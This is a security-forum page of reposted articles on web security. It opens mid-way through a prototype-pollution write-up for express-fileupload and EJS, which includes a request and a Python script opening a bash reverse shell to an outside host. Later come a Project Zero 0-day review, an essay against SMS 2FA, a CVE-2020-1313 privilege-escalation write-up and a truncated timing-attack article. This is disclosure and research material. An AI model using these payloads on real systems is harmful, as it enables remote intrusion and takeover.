these error messages (development mode) or only a blank screen and 500 Internal Server Error! 😮 How to get shell? We can already make a DOS, but everyone wants a shell. So, I’ll describe one way to acquire shell through the vulnerability above. The simplest way to obtain shell through prototype solution in the express application is by using the ejs. Yes, There is a limitation to whether the application should be using the ejs template engine But the EJS is the most popular template engine for the nodejs and also used very often in combination with the express. If this vulnerability exists, you can bet on this. (no guaranteed 😏) 1 2 3 4 5 6 7 8 9 10 11 12 const express = require('express'); const fileUpload = require('express-fileupload'); const app = express(); app.use(fileUpload({ parseNested: true })); app.get('/', (req, res) => { console.log(Object.prototype.polluted); res.render('index.ejs'); }); app.listen(7777); The above is an example of using the ejs module. There was only one line change in replacing the rendering engine. Because the parseNested option is still active, we can still pollute prototype. Unlike the above here, I will use req.body object. Because we can manipulated the value of that as string. 1 2 3 4 5 6 7 8 9 POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=--------1566035451 Content-Length: 137 ----------1566035451 Content-Disposition: form-data; name="__proto__.polluted"; content ----------1566035451-- Similar with above, but the filenameof Content-Disposition has been deleted. Then the value will go to req.body not req.files. ) By checking the values that enter the processNested function You can see that the values that were previously objects is now string. pollution happens the same as before. 1 2 3 4 5 6 7 8 9 10 function Template(text, opts) { opts = opts || {}; var options = {}; this.templateText = text; /** @type {string | null} */ ... options.outputFunctionName = opts.outputFunctionName; options.localsName = opts.localsName || exports.localsName || _DEFAULT_LOCALS_NAME; options.views = opts.views; options.async = opts.async; The target value to pollute is the outputFunctionName, which is an option in the ejs rendering function. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 compile: function () { /** @type {string} */ var src; /** @type {ClientFunction} */ var fn; var opts = this.opts; var prepended = ''; var appended = ''; /** @type {EscapeCallback} */ var escapeFn = opts.escapeFunction; /** @type {FunctionConstructor} */ var ctor; if (!this.source) { this.generateSource(); prepended += ' var __output = "";\n' + ' function __append(s) { if (s !== undefined && s !== null) __output += s }\n'; if (opts.outputFunctionName) { prepended += ' var ' + opts.outputFunctionName + ' = __append;' + '\n'; } if (opts.destructuredLocals && opts.destructuredLocals.length) { var destructuring = ' var __locals = (' + opts.localsName + ' || {}),\n'; for (var i = 0; i < opts.destructuredLocals.length; i++) { var name = opts.destructuredLocals[i]; if (i > 0) { destructuring += ',\n '; } destructuring += name + ' = __locals.' + name; } prepended += destructuring + ';\n'; } if (opts._with !== false) { prepended += ' with (' + opts.localsName + ' || {}) {' + '\n'; appended += ' }' + '\n'; } appended += ' return __output;' + '\n'; this.source = prepended + this.source + appended; } The ejs makes Function for implement their template and executing and the outputFunctionName option used in the process is included in the function. Therefore, if we can manipulate this value, any command can be executed. This technique was introduced by a Chinese CTF in 2019. Please refer to here for details. That part has not been patched so far, and it is expected to remain in the future. So we can take advantage of it. 1 2 3 4 5 6 7 8 9 POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=--------1566035451 Content-Length: 221 ----------1566035451 Content-Disposition: form-data; name="__proto__.outputFunctionName"; x;process.mainModule.require('child_process').exec('bash -c "bash -i &> /dev/tcp/p6.is/8888 0>&1"');x ----------1566035451-- So first, we’re going to pollute the Object.prototype.outputFunctionName using the prototype pollution. 1 2 GET / HTTP/1.1 Host: p6.is:7777 and calls template function of ejs. Then we can get the shell ! If all the process can be represented by python: 1 2 3 4 5 6 7 8 9 10 import requests cmd = 'bash -c "bash -i &> /dev/tcp/p6.is/8888 0>&1"' # pollute requests.post('http://p6.is:7777', files = {'__proto__.outputFunctionName': ( None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")}) # execute command requests.get('http://p6.is:7777') Reference https://github.com/richardgirges/express-fileupload/issues/236 https://www.npmjs.com/package/express-fileupload https://github.com/NeSE-Team/OurChallenges/tree/master/XNUCA2019Qualifier/Web/hardjs Sursa: https://blog.p6.is/Real-World-JS-1/
  14. I'm a bug bounty hunter who's learning everyday and sharing useful resources as I move along. Subscribe to my channel because I'll be sharing my knowledge in new videos regularly.
  15. Detection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019 Posted by Maddie Stone, Project Zero In May 2019, Project Zero released our tracking spreadsheet for 0-days used “in the wild” and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we’ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another blog post today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing 8 root cause analyses that we have done for in-the-wild 0-days from 2019. When I had the idea for this “Year in Review” blog post, I immediately started brainstorming the different ways we could slice the data and the different conclusions it may show. I thought that maybe there’d be interesting conclusions around why use-after-free is one of the most exploited bug classes or how a given exploitation method was used in Y% of 0-days or… but despite my attempts to find these interesting technical conclusions, over and over I kept coming back to the problem of the detection of 0-days. Through the variety of areas I explored, the data and analysis continued to highlight a single conclusion: As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected. The rest of the blog post will detail the analyses I did on 0-days exploited in 2019 that informed this conclusion. As a team, Project Zero will continue to research new detection methods for 0-days. We hope this post will convince you to work with us on this effort. The Basics In 2019, 20 0-days were detected and disclosed as exploited in the wild. This number, and our tracking, is scoped to targets and areas that Project Zero actively researches. You can read more about our scoping here. This seems approximately average for years 2014-2017 with an uncharacteristically low number of 0-days detected in 2018. Please note that Project Zero only began tracking the data in July 2014 when the team was founded and so the numbers for 2014 have been doubled as an approximation. The largely steady number of detected 0-days might suggest that defender detection techniques are progressing at the same speed as attacker techniques. That could be true. Or it could not be. The data in our spreadsheet are only the 0-day exploits that were detected, not the 0-day exploits that were used. As long as we still don’t know the true detection rate of all 0-day exploits, it’s very difficult to make any conclusions about whether the number of 0-day exploits deployed in the wild are increasing or decreasing. For example, if all defenders stopped detection efforts, that could make it appear that there are no 0-days being exploited, but we’d clearly know that to be false. All of the 0-day exploits detected in 2019 are detailed in the Project Zero tracking spreadsheet here. 0-days by Vendor One of the common ways to analyze vulnerabilities and security issues is to look at who is affected. The breakdown of the 0-days exploited in 2019 by vendor is below. While the data shows us that almost all of the big platform vendors have at least a couple of 0-days detected against their products, there is a large disparity. Based on the data, it appears that Microsoft products are targeted about 5x more than Apple and Google products. Yet Apple and Google, with their iOS and Android products, make up a huge majority of devices in the world. While Microsoft Windows has always been a prime target for actors exploiting 0-days, I think it’s more likely that we see more Microsoft 0-days due to detection bias. Because Microsoft has been a target before some of the other platforms were even invented, there have been many more years of development into 0-day detection solutions for Microsoft products. Microsoft’s ecosystem also allows for 3rd parties, in addition to Microsoft themself, to deploy detection solutions for 0-days. The more people looking for 0-days using varied detection methodologies suggests more 0-days will be found. Microsoft Deep-Dive For 2019, there were 11 0-day exploits detected in-the-wild in Microsoft products, more than 50% of all 0-days detected. Therefore, I think it’s worthwhile to dive into the Microsoft bugs to see what we can learn since it’s the only platform we have a decent sample size for. Of the 11 Microsoft 0-days, only 4 were detected as exploiting the latest software release of Windows . All others targeted earlier releases of Windows, such as Windows 7, which was originally released in 2009. Of the 4 0-days that exploited the latest versions of Windows, 3 targeted Internet Explorer, which, while it’s not the default browser for Windows 10, is still included in the operating system for backwards compatibility. This means that 10/11 of the Microsoft vulnerabilities targeted legacy software. Out of the 11 Microsoft 0-days, 6 targeted the Win32k component of the Windows operating system. Win32k is the kernel component responsible for the windows subsystem, and historically it has been a prime target for exploitation. However, with Windows 10, Microsoft dedicated resources to locking down the attack surface of win32k. Based on the data of detected 0-days, none of the 6 detected win32k exploits were detected as exploiting the latest Windows 10 software release. And 2 of the 0-days (CVE-2019-0676 and CVE-2019-1132) only affected Windows 7. Even just within the Microsoft 0-days, there is likely detection bias. Is legacy software really the predominant targets for 0-days in Microsoft Windows, or are we just better at detecting them since this software and these exploit techniques have been around the longest? CVE Windows 7 SP1 Windows 8.1 Windows 10 Win 10 1607 WIn 10 1703 WIn 10 1803 Win 10 1809 Win 10 1903 Exploitation of Latest SW Release? Component CVE-2019-0676 X X X X X X X Yes (1809) IE CVE-2019-0808 X N/A (1809) win32k CVE-2019-0797 X X X X X X Exploitation Unlikely (1809) win32k CVE-2019-0703 X X X X X X X Yes (1809) Windows SMB CVE-2019-0803 X X X X X X X Exp More Likely (1809) win32k CVE-2019-0859 X X X X X X X Exp More Likely (1809) win32k CVE-2019-0880 X X X X X X X X Exp More Likely (1903) splwow64 CVE-2019-1132 X N/A (1903) win32k CVE-2019-1367 X X X X X X X X Yes (1903) IE CVE-2019-1429 X X X X X X X Yes (1903) IE CVE-2019-1458 X X X X N/A (1909) win32k Internet Explorer JScript 0-days CVE-2019-1367 and CVE-2019-1429 While this blog post’s goal is not to detail each 0-day used in 2019, it’d be remiss not to discuss the Internet Explorer JScript 0-days. CVE-2019-1367 and CVE-2019-1429 (and CVE-2018-8653 from Dec 2018 and CVE-2020-0674 from Feb 2020) are all variants of each other with all 4 being exploited in the wild by the same actor according to Google’s Threat Analysis Group (TAG). Our root cause analysis provides more details on these bugs, but we’ll summarize the points here. The bug class is a JScript variable not being tracked by the garbage collector. Multiple instances of this bug class were discovered in Jan 2018 by Ivan Fratric of Project Zero. In December 2018, Google's TAG discovered this bug class being used in the wild (CVE-2018-8653). Then in September 2019, another exploit using this bug class was found. This issue was “fixed” as CVE-2019-1367, but it turns out the patch didn’t actually fix the issue and the attackers were able to continue exploiting the original bug. At the same time, a variant was also found of the original bug by Ivan Fratric (P0 1947). Both the variant and the original bug were fixed as CVE-2019-1429. Then in January 2020, TAG found another exploit sample, because Microsoft’s patch was again incomplete. This issue was patched as CVE-2020-0674. A more thorough discussion on variant analysis and complete patches is due, but at this time we’ll simply note: The attackers who used the 0-day exploit had 4 separate chances to continue attacking users after the bug class and then particular bugs were known. If we as an industry want to make 0-day harder, we can’t give attackers four chances at the same bug. Memory Corruption 63% of 2019’s exploited 0-day vulnerabilities fall under memory corruption, with half of those memory corruption bugs being use-after-free vulnerabilities. Memory corruption and use-after-free’s being a common target is nothing new. “Smashing the Stack for Fun and Profit”, the seminal work describing stack-based memory corruption, was published back in 1996. But it’s interesting to note that almost two-thirds of all detected 0-days are still exploiting memory corruption bugs when there’s been so much interesting security research into other classes of vulnerabilities, such as logic bugs and compiler bugs. Again, two-thirds of detected 0-days are memory corruption bugs. While I don’t know for certain that that proportion is false, we can't know either way because it's easier to detect memory corruption than other types of vulnerabilities. Due to the prevalence of memory corruption bugs and that they tend to be less reliable then logic bugs, this could be another detection bias. Types of memory corruption bugs tend to be very similar within platforms and don’t really change over time: a use-after-free from a decade ago largely looks like a use-after-free bug today and so I think we may just be better at detecting these exploits. Logic and design bugs on the other hand rarely look the same because in their nature they’re taking advantage of a specific flaw in the design of that specific component, thus making it more difficult to detect than standard memory corruption vulns. Even if our data is biased to over-represent memory corruption vulnerabilities, memory corruption vulnerabilities are still being regularly exploited against users and thus we need to continue focusing on systemic and structural fixes such as memory tagging and memory safe languages. More Thoughts on Detection As we’ve discussed up to this point, the same questions posed in the team's original blog post still hold true: “What is the detection rate of 0-day exploits?” and “How many 0-day exploits are used without being detected?”. We, as the security industry, are only able to review and analyze 0-days that were detected, not all 0-days that were used. While some might see this data and say that Microsoft Windows is exploited with 0-days 11x more often than Android, those claims cannot be made in good faith. Instead, I think the security community simply detects 0-days in Microsoft Windows at a much higher rate than any other platform. If we look back historically, the first anti-viruses and detections were built for Microsoft Windows rather than any other platform. As time has continued, the detection methods for Windows have continued to evolve. Microsoft builds tools and techniques for detecting 0-days as well as third party security companies. We don’t see the same plethora of detection tools on other platforms, especially the mobile platforms, which means there’s less likelihood of detecting 0-days on those platforms too. An area for big growth is detecting 0-days on platforms other than Microsoft Windows and what level of access a vendor provides for detection.. Who is doing the detecting? Another interesting side of detection is that a single security researcher, Clément Lecigne of the Google's TAG is credited with 7 of the 21 detected 0-days in 2019 across 4 platforms: Apple iOS (CVE-2019-7286, CVE-2019-7287), Google Chrome (CVE-2019-5786), Microsoft Internet Explorer (CVE-2019-0676, CVE-2019-1367, CVE-2019-1429), and Microsoft Windows (CVE-2019-0808). Put another way, we could have detected a third less of the 0-days actually used in the wild if it wasn’t for Clément and team. When we add in the entity with the second most, Kaspersky Lab, with 4 of the 0-days (CVE-2019-0797, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458), that means that two entities are responsible for more than 50% of the 0-days detected in 2019. If two entities out of the entirety of the global security community are responsible for detecting more than half of the 0-days in a year, that’s a worrying sign for how we’re using our resources. . The security community has a lot of growth to do in this area to have any confidence that we are detecting the majority of 0-days exploits that are used in the wild. Out of the 20 0-days, only one (CVE-2019-0703) included discovery credit to the vendor that was targeted, and even that one was also credited to an external researcher. To me, this is surprising because I’d expect that the vendor of a platform would be best positioned to detect 0-days with their access to the most telemetry data, logs, ability to build detections into the platform, “tips” about exploits, etc. This begs the question: are the vendor security teams that have the most access not putting resources towards detecting 0-days, or are they finding them and just not disclosing them when they are found internally? Either way, this is less than ideal. When you consider the locked down mobile platforms, this is especially worrisome since it’s so difficult for external researchers to get into those platforms and detect exploitation. “Clandestine” 0-day reporting Anecdotally, we know that sometimes vulnerabilities are reported surreptitiously, meaning that they are reported as just another bug, rather than a vulnerability that is being actively exploited. This hurts security because users and their enterprises may take different actions, based on their own unique threat models, if they knew a vulnerability was actively exploited. Vendors and third party security professionals could also create better detections, invest in related research, prioritize variant analysis, or take other actions that could directly make it more costly for the attacker to exploit additional vulnerabilities and users if they knew that attackers were already exploiting the bug. If all would transparently disclose when a vulnerability is exploited, our detection numbers would likely go up as well, and we would have better information about the current preferences and behaviors of attackers. 0-day Detection on Mobile Platforms As mentioned above, an especially interesting and needed area for development is mobile platforms, iOS and Android. In 2019, there were only 3 detected 0-days for all of mobile: 2 for iOS (CVE-2019-7286 and CVE-2019-7287) and 1 for Android (CVE-2019-2215). However, there are billions of mobile phone users and Android and iOS exploits sell for double or more compared to an equivalent desktop exploit according to Zerodium. We know that these exploits are being developed and used, we’re just not finding them. The mobile platforms, iOS and Android, are likely two of the toughest platforms for third party security solutions to deploy upon due to the “walled garden” of iOS and the application sandboxes of both platforms. The same features that are critical for user security also make it difficult for third parties to deploy on-device detection solutions. Since it’s so difficult for non-vendors to deploy solutions, we as users and the security community, rely on the vendors to be active and transparent in hunting 0-days targeting these platforms. Therefore a crucial question becomes, how do we as fellow security professionals incentivize the vendors to prioritize this? Another interesting artifact that appeared when doing the analysis is that CVE-2019-2215 is the first detected 0-day since we started tracking 0-days targeting Android. Up until that point, the closest was CVE-2016-5195, which targeted Linux. Yet, the only Android 0-day found in 2019 (AND since 2014) is CVE-2019-2215, which was detected through documents rather than by finding a zero-day exploit sample. Therefore, no 0-day exploit samples were detected (or, at least, publicly disclosed) in all of 2019, 2018, 2017, 2016, 2015, and half of 2014. Based on knowledge of the offensive security industry, we know that that doesn’t mean none were used. Instead it means we aren’t detecting well enough and 0-days are being exploited without public knowledge. Therefore, those 0-days go unpatched and users and the security community are unable to take additional defensive actions. Researching new methodologies for detecting 0-days targeting mobile platforms, iOS and Android, is a focus for Project Zero in 2020. Detection on Other Platforms It’s interesting to note that other popular platforms had no 0-days detected over the same period: like Linux, Safari, or macOS. While no 0-days have been publicly detected in these operating systems, we can have confidence that they are still targets of interest, based on the amount of users they have, job requisitions for offensive positions seeking these skills, and even conversations with offensive security researchers. If Trend Micro’s OfficeScan is worth targeting, then so are the other much more prevalent products. If that’s the case, then again it leads us back to detection. We should also keep in mind though that some platforms may not need 0-days for successful exploitation. For example, this blogpost details how iOS exploit chains used publicly known n-days to exploit WebKit. But without more complete data, we can’t make confident determinations of how much 0-day exploitation is occurring per platform. Conclusion Here’s our first Year in Review of 0-days exploited in the wild. As this program evolves, so will what we publish based on feedback from you and as our own knowledge and experience continues to grow. We started this effort with the assumption of finding a multitude of different conclusions, primarily “technical”, but once the analysis began, it became clear that everything came back to a single conclusion: we have a big gap in detecting 0-day exploits. Project Zero is committed to continuing to research new detection methodologies for 0-day exploits and sharing that knowledge with the world. Along with publishing this Year in Review today, we’re also publishing the root cause analyses that we completed, which were used to draw our conclusions. Please check out the blog post if you’re interested in more details about the different 0-days exploited in the wild in 2019. Posted by Tim at 10:27 AM Sursa: https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html
  16. You don’t need SMS-2FA. I believe that SMS 2FA is wholly ineffective, and advocating for it is harmful. This post will respond to the three main arguments SMS proponents make, and propose a simpler, cheaper, more accessible and more effective solution that works today. Just like yesterday's topic of reproducible builds, discussions about SMS-2FA get heated very quickly. I've found that SMS-2FA deployment or advocacy has been a major professional project for some people, and they take questioning it's efficacy personally. Here are the main arguments I’ve heard for SMS 2FA: SMS 2FA can prevent phishing. SMS 2FA can’t prevent phishing, but it can prevent “credential stuffing”. We have data proving that SMS 2FA is effective. I’ll cover some other weaker arguments I’ve heard too, but these are the important ones. Does SMS 2FA Prevent Phishing? I assume anyone interested in this topic already knows how phishing works, so I’ll spare you the introduction. If a phishing attack successfully collects a victim's credentials, then the user must have incorrectly concluded that the site they’re using is authentic. The problem with using SMS-2FA to mitigate this problem is that there’s no reason to think that after entering their credentials, they would not also enter any OTP. I’ve found that lots of people find this attack difficult to visualize, even security engineers. Let’s look at a demonstration video of a penetration testing tool for phishing SMS-2FA codes to see the attack in action. There are a few key details to notice in this video. The SMS received is authentic. It cannot be filtered, blocked or identified as part of a phishing attempt. Notice the attackers console (around 1:05 in the video). For this demonstration it only contains a single session, but could store unlimited sessions. The attacker does not have to be present during the phishing. Installing and using this software is no more complicated than installing and using a phishing kit that doesn’t support SMS-2FA. An attacker does not need to intercept or modify the SMS, in particular no “links” are added to the SMS (this is a common misconception, even from security engineers). The phishing site is a pixel perfect duplicate of the original. I think a reasonable minimum bar for any mitigation to be considered a “solution” to an attack, is that a different attack is required. As SMS-2FA can be defeated with phishing, it simply doesn’t meet that bar. To reiterate, SMS 2FA can be phished, and therefore is not a solution to phishing. Does SMS 2FA Prevent “Credential Stuffing”? Credential stuffing is when the usernames and passwords collected from one compromised site are replayed to another site. This is such a cheap and effective attack that it’s a significant source of compromise. Credential stuffing works because password reuse is astonishingly common. It’s important to emphasise that if you don’t reuse passwords, you are literally immune to credential stuffing. The argument for SMS-2FA is that credential stuffing can no longer be automated. If that were true, SMS-2FA would qualify as a solution to credential stuffing, as an attacker would need to use a new attack, such as phishing, to obtain the OTP. Unfortunately, it doesn’t work like that. When a service enables SMS-2FA, an attacker can simply move to a different service. This means that a new attack isn’t necessary, just a new service. The problem is not solved or even mitigated, the user is still compromised and the problem is simply shifted around. Doesn’t the data show that SMS 2FA Works? Vendors often report reductions in phishing and credential stuffing attacks after implementing SMS-2FA. Proponents point out that whether SMS-2FA works in theory or not is irrelevant, we can measure and see that it works in practice. This result can be explained with simple economics. The opportunistic attackers that use mass phishing campaigns don’t care who they compromise, their goal is to extract a small amount of value from a large number of compromised accounts. If the vendor implements SMS 2FA, the attacker is forced to upgrade their phishing tools and methodology to support SMS 2FA if they want to compromise those accounts. This is a one-off cost that might require purchasing a new phishing toolkit. A rational phisher must now calculate if adding support for SMS 2FA will increase their victim yield enough to justify making this investment. If only 1% of accounts enable SMS 2FA, then we can reasonably assume supporting SMS-2FA will increase victim yield by 1%. Will the revenue from a 1% higher victim yield allow the phisher to recoup their investment costs? Today, the adoption is still too low to justify that cost, and this explains why SMS 2FA enabled accounts are phished less often, it simply makes more sense to absorb the loss until penetration is higher. For targeted (as opposed to opportunistic) phishing, it often does make economic sense to support SMS-2FA today, and we do see phishers implement support for SMS-2FA in their tools and processes. Even if SMS 2FA is flawed, isn’t that still “raising the bar”? It is true that, if universally adopted, SMS 2FA would force attackers to make a one-time investment to update their tools and process. Everyone likes the idea of irritating phishers, they’re criminals who defraud and cheat innocent people. Regardless, we have to weigh the costs of creating that annoyance. We have a finite pool of good will with which we can advocate for the implementation of new security technologies. If we spend all that good will on irritating attackers, then by the time we’re ready to actually implement a solution, developers are not going to be interested. This is the basis for my argument that SMS-2FA is not only worthless, but harmful. We’re wasting what little good will we have left. Are there better solutions than SMS 2FA? Proponents are quick to respond that something must be done. Here’s the good news, we already have excellent solutions that actually work, are cheaper, simpler and more accessible. If you’re a security conscious user... You don’t need SMS-2FA. You can use unique passwords, this makes you immune to credential stuffing and reduces the impact of phishing. If you use the password manager built in to modern browsers, it can effectively eliminate phishing as well. If you use a third party password manager, you might not realize that modern browsers have password management built in with a beautiful UX. Frankly, it’s harder to not use it. Even if you can’t use a password manager, it is totally acceptable to record your passwords in a paper notebook, spreadsheet, rolodex, or any other method you have available to record data. These are cheap, universally available and accessible. This is great news: you can take matters into your own hands, with no help from anyone else you can protect yourself and your loved ones from credential stuffing. Q. What if I install malware, can’t the malware steal my password database? Yes, but SMS-2FA (and even U2F) also don’t protect against malware. For that, the best solution we have is Application Whitelisting. Therefore, this is not a good reason to use SMS-2FA. If you’re a security conscious vendor... You don’t need SMS-2FA. You can eliminate credential stuffing attacks entirely with a cheap and effective solution. You are currently allowing your users to choose their own password, and many of them are using the same password they use on other services. There is no other possible way your users are vulnerable to credential stuffing. Instead, why not simply randomly generate a good password for them, and instruct them to write it down or save it in their web browser? If they lose it, they can use your existing password reset procedure. This perfectly eliminates credential stuffing, but won’t eliminate phishing (but neither will SMS-2FA). If you also want to eliminate phishing, you have two excellent options. You can either educate your users on how to use a password manager, or deploy U2F, FIDO2, WebAuthn, etc. This can be done with hardware tokens or a smartphone. If neither of those two options appeal to you, that doesn’t mean you should deploy SMS-2FA, because SMS-2FA doesn't work. Minor arguments in favor of SMS-2FA SMS-2FA makes the login process slower, and that gives users more time to think about security. [Note: I’m not making this up, proponents really make this argument, e.g. here, here and here] This idea is patently absurd. However, If you genuinely believe this, you don’t need SMS-2FA. A simple protocol that will make login slower is to split the login process, first requesting the username and then the password. When you receive the username, mint a signed and timestamped token and add it to a hidden form field. You can then pause before allowing the token to be submitted and requesting another token that must accompany the password. This is far simpler than integrating SMS, as you can just modify the logic you are already using to protect against XSRF. If you are not already protecting against XSRF, my advice would be to fix that problem before implementing any dubious “slower is better” theories. Attackers vary in ability, and some will not be able to upgrade their scripts. If you can purchase and install one kit, it is pretty reasonable to assume that you are capable of purchasing and installing another. The primary barrier here is the cost of upgrading, not hacking ability. When adoption is high enough that it’s possible to recoup those costs, phishers will certainly upgrade. Don’t let the perfect be the enemy of the good. Seat belts aren’t perfect either, do you argue we shouldn’t wear them? Etc, etc. This argument only works if what you’re defending is good. As I’ve already explained, SMS-2FA is not good. Unique Passwords and U2F are not perfect, but they are good. Unique Passwords reduce the impact of phishing, but can’t eliminate it. U2F doesn’t prevent malware, but does prevent phishing. A phishing kit that implements SMS-2FA support is more complex than one that doesn’t. That’s true, but this complexity can be hidden from the phisher. I don’t know anything about audio processing, but I can still play MP3s. I simply purchased the software and hardware from someone who does understand those topics. What about "SIM swapping" attacks? SIM swapping attacks are a legitimate concern, but if that was the only problem with SMS-2FA, my opinion is that would not be enough to dismiss it. Posted by taviso at 10:23 AM Sursa: http://blog.cmpxchg8b.com/2020/07/you-dont-need-sms-2fa.html
  17. CVE-2020-1313 Abstract Windows Update Orchestrator Service is a DCOM service used by other components to install windows updates that are already downloaded. USO was vulnerable to Elevation of Privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020. The vulnerability The UniversalOrchestrator service (9C695035-48D2-4229-8B73-4C70E756E519), implemented in usosvc.dll is running as NT_AUTHORITY\SYSTEM and is configured with access permissions for BUILTIN\Users (among others). Even though enumeration of the COM classes implemented by this service is blocked (OLEView.NET: Error querying COM interfaces - ClassFactory cannot supply requested class), the IUniversalOrchestrator interface (c53f3549-0dbf-429a-8297-c812ba00742d) - as exposed by the proxy defintion - can be obtained via standard COM API calls. The following 3 methods are exported: virtual HRESULT __stdcall HasMoratoriumPassed(wchar_t* uscheduledId, int64_t* p1);//usosvc!UniversalOrchestrator::HasMoratoriumPassed virtual HRESULT __stdcall ScheduleWork(wchar_t* uscheduledId, wchar_t* cmdLine, wchar_t* startArg, wchar_t* pauseArg);//usosvc!UniversalOrchestrator::ScheduleWork virtual HRESULT __stdcall WorkCompleted(wchar_t* uscheduledId, int64_t p1);//usosvc!UniversalOrchestrator::WorkCompleted The ScheduleWork method can be used to schedule a command to be executed in the context of the service and can be done without any authorization of the requestor. Though the target executable itself must be digitally signed and located under c:\windows\system32 or common files in Program Files, command line arguments can be specified as well. This makes it possible to launch c:\windows\system32\cmd.exe and gain arbitrary code execution this way under NT_AUTHORITY\SYSTEM making this issue a local privilege escalation. The work is "scheduled", it is not kicked off immediately. Proof of Concept The PoC I created configures a "work" with cmdLine c:\windows\system32\cmd.exe and parameters: /c "whoami > c:\x.txt & whoami /priv >>c:\x.txt" Executing it: C:\111>whoami desktop-43rnlku\unprivileged C:\111>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ==================================== ======== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled C:\111>whoami /priv C:\111>UniversalOrchestratorPrivEscPoc.exe Obtaining reference to IUniversalOrchestrator Scheduling work with id 56594 Succeeded. You may verify HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler to see the task has indeed been onboarded. The command itself will be executed overnight if there is no user interaction on the box or after 3 days SLA has passed. An entry about the scheduled work is added to the registry: The specified command is executed overnight (around 23:20) when no user interaction is expected, or after 3 days of SLA has passed. How was this issue found? When I couldn't obtain the interface definition of the USO service with OleView.NET, I created a script to go through hundreds of CLSID/IID combinations and that I expected to work at some level. It looked something like this: void TestUpdateOrchestratorInterfaceAgainstService(IID& clsId, const char* className, const wchar_t* iidStr, const char *interfaceName) { void *ss = NULL; IID iid; ThrowOnError(IIDFromString(iidStr, (LPCLSID)&iid)); // working with e at the end, failing with anything else HRESULT res = CoCreateInstance(clsId, nullptr, CLSCTX_LOCAL_SERVER, iid, (LPVOID*)&ss); printf("%s %s: %s\n", className, interfaceName, res == S_OK ? "WORKING" : "failure"); } void TestUpdateOrchestratorInterface(const wchar_t* iidStr, const char *interfaceName) { // TestUpdateOrchestratorInterfaceAgainstService(CLSID_AutomaticUpdates, "AutomaticUpdates", iidStr, interfaceName); // timeouting! TestUpdateOrchestratorInterfaceAgainstService(CLSID_UxUpdateManager, "UxUpdateManager", iidStr, interfaceName); TestUpdateOrchestratorInterfaceAgainstService(CLSID_UsoService, "UsoService", iidStr, interfaceName); TestUpdateOrchestratorInterfaceAgainstService(CLSID_UpdateSessionOrchestrator, "UpdateSessionOrchestrator", iidStr, interfaceName); TestUpdateOrchestratorInterfaceAgainstService(CLSID_UniversalOrchestrator, "UniversalOrchestrator", iidStr, interfaceName); // TestUpdateOrchestratorInterfaceAgainstService(CLSID_SomeService, "SomeService", iidStr, interfaceName); // timeouting! } ... TestUpdateOrchestratorInterface(L"{c57692f8-8f5f-47cb-9381-34329b40285a}", "IMoUsoOrchestrator"); TestUpdateOrchestratorInterface(L"{4284202d-4dc1-4c68-a21e-5c371dd92671}", "IMoUsoUpdate"); TestUpdateOrchestratorInterface(L"{c879dd73-4bd2-4b76-9dd8-3b96113a2130}", "IMoUsoUpdateCollection"); // ... and hundreds of more The result of the approach was: UniversalOrchestrator IUniversalOrchestrator: WORKING UpdateSessionOrchestrator IUpdateSessionOrchestrator: WORKING UxUpdateManager IUxUpdateManager: WORKING Then I started reverse engineering the implementation and found the flow described above. The fix Microsoft fixed this issue on Patch Tuesday June 2020 by adding the missing CoImpersonateClient API call. Implementation before the fix applied: Implementation after the fix applied: How does this help? Impersonation is done at the beginning of processing the request, so the API calls to update the registry are executed in the caller's security context. If the caller has no privilege on HKEY_LOCAL_MACHINE, the uso API method will fail accordingly. Credits Imre Rad More info https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1313 Sursa: https://github.com/irsl/CVE-2020-1313
  18. Researchers exploit HTTP/2, WPA3 protocols to stage highly efficient ‘timeless timing’ attacks Ben Dickson 30 July 2020 at 12:31 UTC Updated: 30 July 2020 at 13:54 UTC Hacking Techniques Research Vulnerabilities New hacking technique overcomes ‘network jitter’ issue that can impact the success of side-channel attacks Malicious actors can take advantage of special features in network protocols to leak sensitive information, a new technique developed by researchers at Belgium’s KU Leuven and New York University Abu Dhabi shows. Presented at this year’s Usenix conference, the technique, named ‘Timeless Timing Attacks’, exploits the way network protocols handle concurrent requests to solve one of the endemic challenges of remote timing side-channel attacks. The challenges of remote timing attacks Timing attacks measure differences in computation times between different commands in attempts to get past the protection offered by encryption and infer clues about sensitive information such as encryption keys, private conversations, and browsing habits. But to successfully stage timing attacks, an attacker needs precise knowledge of the time it takes for the targeted application to process a request. This turns into a problem when targeting remote systems such as web servers, as network delay – the jitter – causes variations in the response time that makes it difficult to calculate the processing time. In remote timing attacks, assailants usually send each command multiple times and perform statistical analysis on the response times to reduce the effects of the network jitter. But this technique only works to a degree. “The smaller the timing difference, the more requests are needed, and at some point it becomes infeasible,” Tom Van Goethem, security researcher at KU Leuven and lead author of the timeless attack paper, told The Daily Swig. Timeless timing attack The technique developed by Goethem and his colleagues performs remote timing attacks in a way that cancels the effect of the network jitter. The idea behind the timeless timing attack is simple: Make sure the requests reach the server at the exact same time instead of sending them sequentially. Concurrency ensures that both requests enjoy the same network conditions and their performance is unaffected by the path between the attacker and the server. Afterward, the order in which the responses arrive will give you all the information you need to compare computation times. “The main advantage of the timeless timing attacks is that these are much more accurate, so much fewer requests are 